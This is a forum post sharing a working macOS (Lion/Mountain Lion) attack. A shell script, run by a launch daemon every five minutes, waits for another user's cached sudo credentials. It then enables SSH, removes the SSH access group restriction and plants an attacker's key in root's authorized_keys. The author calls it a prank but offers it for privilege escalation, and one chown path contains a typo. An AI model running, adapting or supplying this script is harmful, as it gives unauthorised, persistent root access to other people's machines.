Some of you may remember we were talking about stealing sudo privs from logged in users some time ago. I'd noticed behaviour on an older Red Hat distro which granted sudo to a user even if it wasn't created by the same session.

Recently a coworker and I have started being childish - whenever someone leaves a machine unlocked, the other changes a background to something not-quite-completely-offensive. As part of that, I decided it was necessary to steal root privileges on the machine, strictly for amusement purposes.

This script is written for a Mac OS X Mountain Lion machine. It works also under Lion. It is ridiculously noisy, generating stacks of logs every couple of minutes while it waits in the background trying to steal sudo privs. There are other alternatives to this method - you could tail the history file until sudo is run, which would be a lot quieter for example.

Regardless, if you have a copy of sudo that accepts the -n switch, you should be able to make it work.
Code:
#!/bin/sh

sudo -n id -u > /dev/null
if [ $? -eq 0 ];
then
    (
    sudo systemsetup -setremotelogin on
    sudo dscl localhost -delete /Local/Default/Groups/com.apple.access_ssh
    sudo mkdir /var/root/.ssh && \
    sudo chmod 0700 /var/root/.ssh && \
    sudo chown root:wheel /var/root.ssh && \
    sudo perl -e 'print qq|SSH KEY HERE|;' > /tmp/authorized_keys && \
    sudo mv /tmp/authorized_keys /var/root/.ssh/authorized_keys && \
    sudo chmod 0600 /var/root/.ssh/authorized_keys && \
    sudo chown root:wheel /var/root/.ssh/authorized_keys
    ) > /dev/null
fi
I have it wrapped into a launch daemon:
Code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
    <key>Label</key>
    <string>com.dracyrys.sudograbber</string>
    <key>ProgramArguments</key>
    <array>
    <string>/bin/sh</string>
    <string>/Users/admin/.script/grab.sudo.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>300</integer>
    </dict>
</plist>
There are a number of viable options for using this sort of access - in this case I have started SSH and granted root the ability to login with an ssh key.

As always, I'm not supporting the code, merely pointing out that it works in a very new operating environment. sudo on mountain lion is 1.7.4p6

Hopefully you find it interesting, and it helps escalate your privs next time all else has failed you.